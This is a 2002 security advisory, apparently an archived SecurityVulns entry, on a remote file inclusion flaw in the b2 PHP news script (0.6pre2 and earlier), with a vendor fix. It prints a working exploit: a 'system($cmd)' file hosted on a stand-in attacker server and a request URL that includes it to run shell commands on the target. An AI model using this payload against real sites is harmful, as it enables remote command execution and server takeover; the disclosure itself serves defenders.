b2 php remote command execution

2002-05-06T00:00:00
ID SECURITYVULNS:DOC:2896
Type securityvulns
Reporter Securityvulns
Modified 2002-05-06T00:00:00

Description

Site: www.cafelog.com

Vulnerable:

b2 0.6pre2 and earlier.

B2 is a php script which allows webmasters to quikly post

news on the frontpage and let viewers interact with

eachother. A bug exists in the scripts which allows an

attacker to remotely execute commands.

Exploit:

Taken from /b2-include/b2edit.showposts.php

snippet

<?php

include_once ("b2config.php");

include_once ($b2inc."/b2functions.php");

snippet

But since b2config.php does not exist inside the directory,

an attacker can define $b2inc himself.

So if the attacker creates a file on his server, for

example www.attacker.com , called b2functions.php, and he

writes the following in it :

<?

system($cmd);

?>

(note : the attacker's server must not be able to run php,

it has to open the file as text)

he can include the file like this :

http://www.vulnerablehost.com/b2/b2-

include/b2edit.showposts.php?b2inc=http://www.attacker.com&c

md=ls

This would execute the ls command on vulnerablehost.com.

Fix:

Copy b2config.php into the b2-include directory

The vendor has been warned, and already released the same

fix a few days earlier.